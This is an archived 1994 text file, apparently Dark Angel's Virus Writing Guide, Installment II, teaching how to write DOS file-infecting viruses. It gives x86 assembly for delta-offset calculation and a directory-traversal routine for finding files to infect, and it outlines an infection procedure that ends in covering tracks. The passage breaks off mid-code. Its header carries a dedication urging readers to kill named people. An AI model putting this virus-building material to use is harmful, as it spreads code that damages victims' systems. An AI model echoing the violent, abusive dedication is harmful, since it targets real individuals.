home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hackers Underworld 2: Forbidden Knowledge
/
Hackers Underworld 2: Forbidden Knowledge.iso
/
VIRUS
/
PS_VIR2.TXT
< prev
next >
Wrap
Text File
|
1994-07-17
|
30KB
|
597 lines
//==// // // /|| // //==== //==// //| //
// // // // //|| // // // // //|| //
//==// //==// //=|| // // // // // || //
// // // // || // // // // // ||//
// // // // || //==== //==== //==// // ||/
/==== // // // /==== /| /|
// // // // // //| //|
===\ // // // ===\ //|| //||
// // \\ // // // ||// ||
====/ // \\ // ====/ // ||/ ||
──────────────────────────────────────────────
DISCLAIMER: Pretend you see a disclaimer here.
99.44% of the code guaranteed to work.
──────────────────────────────────────────────
DEDICATION: Please try your best to kill those
who made this possible, especially that dumb
bitch who doesn't know her own name (Patty),
and her lover Ross M. Greenberg.
──────────────────────────────────────────────
GREETS -N- STUFF: Greets go to all the members
of PHALCON/SKISM. I wish to give buckets o'
thanks to Hellraiser, Garbageheap, and Demo-
gorgon. No thanks this time to Orion Rouge,
the godly master of idiocy.
──────────────────────────────────────────────
Dark Angel's Chunky Virus Writing Guide
──── ─────── ────── ───── ─────── ─────
───────────────────────────────
INSTALLMENT II: THE REPLICATOR
───────────────────────────────
In the last installment of my Virus Writing Guide, I explained the various
parts of a virus and went into a brief discussion about each. In this
issue, I shall devote all my attention towards the replicator portion of
the virus. I promised code and code I shall present.
However, I shall digress for a moment because it has come to my attention
that some mutant copies of the first installment were inadvertently
released. These copies did not contain a vital section concerning the
calculation of offsets.
You never know where your variables and code are going to wind up in
memory. If you think a bit, this should be pretty obvious. Since you are
attaching the virus to the end of a program, the location in memory is
going to be changed, i.e. it will be larger by the size of the infected
program. So, to compensate, we must take the change in offset from the
original virus, or the delta offset, and add that to all references to
variables.
Instructions that use displacement, i.e. relative offsets, need not be
changed. These instructions are the JA, JB, JZ class of instructions, JMP
SHORT, JMP label, and CALL. Thus, whenever possible use these in favor of,
say, JMP FAR PTR.
Suppose in the following examples, si is somehow loaded with the delta
offset.
Replace
mov ax, counter
With
mov ax, word ptr [si+offset counter]
Replace
mov dx, offset message
With
lea dx, [si+offset message]
You may be asking, "how the farg am I supposed to find the delta offset!?"
It is simple enough:
call setup
setup:
pop si
sub si, offset setup
An explanation of the above fragment is in order. CALL setup pushes the
location of the next instruction, i.e. offset setup, onto the stack. Next,
this location is POPed into si. Finally, the ORIGINAL offset of setup
(calculated at compile-time) is subtracted from si, giving you the delta
offset. In the original virus, the delta offset will be 0, i.e. the new
location of setup equals the old location of setup.
It is often preferable to use bp as your delta offset, since si is used in
string instructions. Use whichever you like. I'll randomly switch between
the two as suits my mood.
Now back to the other stuff...
A biological virus is a parasitic "organism" which uses its host to spread
itself. It must keep the host alive to keep itself "alive." Only when it
has spread everywhere will the host die a painful, horrible death. The
modern electronic virus is no different. It attaches itself to a host
system and reproduces until the entire system is fucked. It then proceeds
and neatly wrecks the system of the dimwit who caught the virus.
Replication is what distinguishes a virus from a simple trojan. Anybody
can write a trojan, but a virus is much more elegant. It acts almost
invisibly, and catches the victim off-guard when it finally surfaces. The
first question is, of course, how does a virus spread? Both COM and EXE
infections (along with sample infection routines) shall be presented.
There are two major approaches to virii: runtime and TSR. Runtime virii
infect, yup, you guessed it, when the infected program is run, while TSR
virii go resident when the infected programs are run and hook the
interrupts and infect when a file is run, open, closed, and/or upon
termination (i.e. INT 20h, INT 21h/41h). There are advantages and
disadvantages to each. Runtime virii are harder to detect as they don't
show up on memory maps, but, on the other hand, the delay while it searches
for and infects a file may give it away. TSR virii, if not properly done,
can be easily spotted by utilities such as MAPMEM, PMAP, etc, but are, in
general, smaller since they don't need a function to search for files to
infect. They are also faster than runtime virii, also because they don't
have to search for files to infect. I shall cover runtime virii here, and
TSR virii in a later installment.
Here is a summary of the infection procedure:
1) Find a file to infect.
2) Check if it meets the infection criteria.
3) See if it is already infected and if so, go back to 1.
4) Otherwise, infect the file.
5) Cover your tracks.
I shall go through each of these steps and present sample code for each.
Note that although a complete virus can be built from the information
below, you cannot merely rip the code out and stick it together, as the
fragments are from various different virii that I have written. You must
be somewhat familiar with assembly. I present code fragments; it is up to
you to either use them as examples or modify them for your own virii.
──────────────────────────────
STEP 1 - FIND A FILE TO INFECT
──────────────────────────────
Before you can infect a file, you have to find it first! This can be a
bottleneck in the performance of the virus, so it should be done as
efficiently as possible. For runtime virii, there are a few possibilities.
You could infect files in only the current directory, or you could write a
directory traversal function to infect files in ALL directories (only a few
files per run, of course), or you could infect files in only a few select
directories. Why would you choose to only infect files in the current
directory? It would appear to limit the efficacy of the infections.
However, this is done in some virii either to speed up the virus or to
shorten the code size.
Here is a directory traversal function. It uses recursion, so it is rather
slow, but it does the job. This was excerpted with some modifications from
The Funky Bob Ross Virus [Beta].
traverse_fcn proc near
push bp ; Create stack frame
mov bp,sp
sub sp,44 ; Allocate space for DTA
call infect_directory ; Go to search & destroy routines
mov ah,1Ah ;Set DTA
lea dx,word ptr [bp-44] ; to space allotted
int 21h ;Do it now!
mov ah, 4Eh ;Find first
mov cx,16 ;Directory mask
lea dx,[si+offset dir_mask] ; *.*
int 21h
jmp s